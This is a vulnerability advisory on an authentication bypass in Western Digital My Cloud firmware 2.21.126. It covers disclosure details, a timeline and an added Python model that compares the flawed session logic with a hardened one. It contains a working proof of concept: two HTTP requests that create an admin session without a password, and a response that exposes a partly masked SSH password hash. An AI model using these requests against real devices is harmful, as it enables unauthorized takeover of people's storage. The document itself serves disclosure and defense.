
Western Digital My Cloud 2.21.126 Authentication Bypass

Posted Apr 22, 2017
Authored by Securify B.V., Remco Vermeulen

Western Digital My Cloud with firmware version 2.21.126 suffers from an authentication bypass vulnerability that allows escalation to administrative privileges.

tags | exploit, bypass
SHA-256 | c88ab660fa85b41bb542f8f2b6aed37318c1e0f94c9900423143b3b9734eae97

------------------------------------------------------------------------
Authentication bypass vulnerability in Western Digital My Cloud allows
escalation to admin privileges
------------------------------------------------------------------------
Remco Vermeulen, April 2017

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was discovered that the Western Digital My Cloud is affected by an
authentication bypass vulnerability. An unauthenticated attacker can
exploit this vulnerability to authenticate as an admin user without
needing to provide a password, thereby gaining full control of the My
Cloud device.

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This vulnerability was successfully verified on a Western Digital My
Cloud model WDBCTL0020HWT running firmware version 2.21.126. This issue
is not limited to the model that was used to find this vulnerability
since most of the products in the My Cloud series share the same
(vulnerable) code.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue was fixed in firmware version 2.30.165.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://www.securify.nl/advisory/SFY20170404/authentication_bypass_vulnerability_in_western_digital_my_cloud_allows_escalation_to_admin_privileges.html

Whenever an admin logs into My Cloud, a server-side session is created that is bound to the user's IP address. Once the session exists, authenticated CGI modules can be called by sending the cookie username=admin in the HTTP request. The invoked CGI checks whether a valid session is present and bound to the user's IP address.

It was found that an unauthenticated attacker can create a valid session without logging in. The system_mgr.cgi CGI module contains a command called cgi_set_wto that starts an admin session tied to the IP address of the user making the request. Subsequent invocations of commands that would normally require admin privileges are then authorized if the attacker sets the username=admin cookie.

Proof of concept

The following steps can be used to exploit this issue. First, establish an admin session tied to the IP of the requester:

POST /cgi-bin/system_mgr.cgi HTTP/1.1
Host: ***.***.***.***
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

cmd=cgi_set_wto

Next, call an endpoint (e.g., cgi_get_ssh_pw_status) that requires admin privileges and authenticate as admin by adding the cookie username=admin.

POST /cgi-bin/system_mgr.cgi HTTP/1.1
Host: ***.***.***.***
Cookie: username=admin
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

cmd=cgi_get_ssh_pw_status

The Western Digital My Cloud device will now respond as follows, indicating success:

HTTP/1.1 200 OK
Date: Sat, 01 Jan 2000 00:18:27 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/xml
Content-Language: en
Content-Length: 113

<?xml version="1.0" encoding="UTF-8"?><ssh><info>sshd:$1$$CoERg7ynjYLsj2j4****.:14746:0:99999:7:::
</info></ssh>
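
The session logic described under Details, modelled next to a hardened design. This is an added example, not firmware code and not part of the original advisory. The class names, the ADMIN_PASSWORD value, the "session" cookie name and the token-based design are assumptions; the advisory does not describe how firmware 2.30.165 implements the fix.

```python
import hmac
import secrets

ADMIN_PASSWORD = "constructed-password"  # constructed sample value


class IpBoundSessions:
    """Model of the behaviour the advisory describes: sessions keyed by IP only."""

    def __init__(self):
        self.admin_ips = set()

    def login(self, ip, user, password):
        if user == "admin" and hmac.compare_digest(password, ADMIN_PASSWORD):
            self.admin_ips.add(ip)
            return True
        return False

    def cgi_set_wto(self, ip):
        # Flaw: starts an admin session for the caller without requiring one.
        self.admin_ips.add(ip)

    def is_admin(self, ip, cookies):
        # The cookie is client-asserted, so only the IP binding carries weight.
        return cookies.get("username") == "admin" and ip in self.admin_ips


class TokenSessions:
    """Hardened model (assumed design): unguessable token issued only by login."""

    def __init__(self):
        self.sessions = {}  # token -> (ip, user)

    def login(self, ip, user, password):
        if user == "admin" and hmac.compare_digest(password, ADMIN_PASSWORD):
            token = secrets.token_urlsafe(32)
            self.sessions[token] = (ip, user)
            return token
        return None

    def cgi_set_wto(self, ip, cookies):
        # Runs only inside an existing session and never creates one.
        return self.is_admin(ip, cookies)

    def is_admin(self, ip, cookies):
        # Identity comes from the server-side record, not from a username cookie.
        return self.sessions.get(cookies.get("session")) == (ip, "admin")
```

In the first model the only secret-free input needed to pass is_admin is a prior cgi_set_wto call from the same address; in the second, the same sequence is rejected because no token was ever issued.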


Timeline

- 09 April 2017: Discovered vulnerability.
- 10 April 2017: Reported to Western Digital customer support.
- 10 April 2017: Response from Western Digital that the vulnerability has been forwarded to their vulnerability assessment team.
- 12 April 2017: Fix released in firmware 2.30.165. However, no response from Western Digital.